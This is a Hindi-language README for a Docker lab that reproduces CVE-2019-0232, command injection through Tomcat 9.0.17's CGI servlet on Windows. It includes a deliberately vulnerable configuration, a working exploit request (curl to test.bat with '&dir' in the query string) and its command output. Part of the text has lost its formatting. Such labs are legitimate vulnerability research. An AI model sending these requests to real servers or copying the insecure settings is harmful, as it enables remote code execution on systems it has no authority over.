
यह रिपॉजिटरी Windows पर Apache Tomcat 9.0.17 में CVE-2019-0232 भेद्यता को दोहराने के लिए एक Docker-आधारित लैब वातावरण प्रदान करती है।
CVE-2019-0232, Windows पर चलने पर Apache Tomcat CGI Servlet में एक दूरस्थ कोड निष्पादन भेद्यता है। यह समस्या कमांड-लाइन तर्कों के अनुचित प्रबंधन के कारण उत्पन्न होती है जब enableCmdLineArguments पैरामीटर true पर सेट होता है। एक हमलावर क्वेरी स्ट्रिंग के माध्यम से CGI स्क्रिप्ट में मनमाने तर्क पास कर सकता है, जिससे सिस्टम कमांड का निष्पादन होता है।
enableCmdLineArguments=truetomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
├── apache-tomcat-9.0.17-windows-x64.zip
└── apache-tomcat-9.0.17
├── conf
│ └── context.xml ← (privileged="true")
└── webapps
└── ROOT
└── WEB-INF
├── web.xml ← (CGI configuration)
└── cgi-bin
└── test.bat ← (.bat script)
privileged="true" सेट करता है।enableCmdLineArguments=true के साथ परिभाषित करता है और इसे /cgi-bin/* पर मैप करता है।docker-compose build --no-cache
docker-compose up -d
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"
Welcome to CGI Test Page
Volume in drive C has no label.
Volume Serial Number is 3E70-7C38
Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin
07/12/2026 11:45 AM <DIR> .
07/12/2026 11:45 AM <DIR> ..
07/12/2026 12:25 PM 78 test.bat
1 File(s) 78 bytes
2 Dir(s) 136,027,971,584 bytes free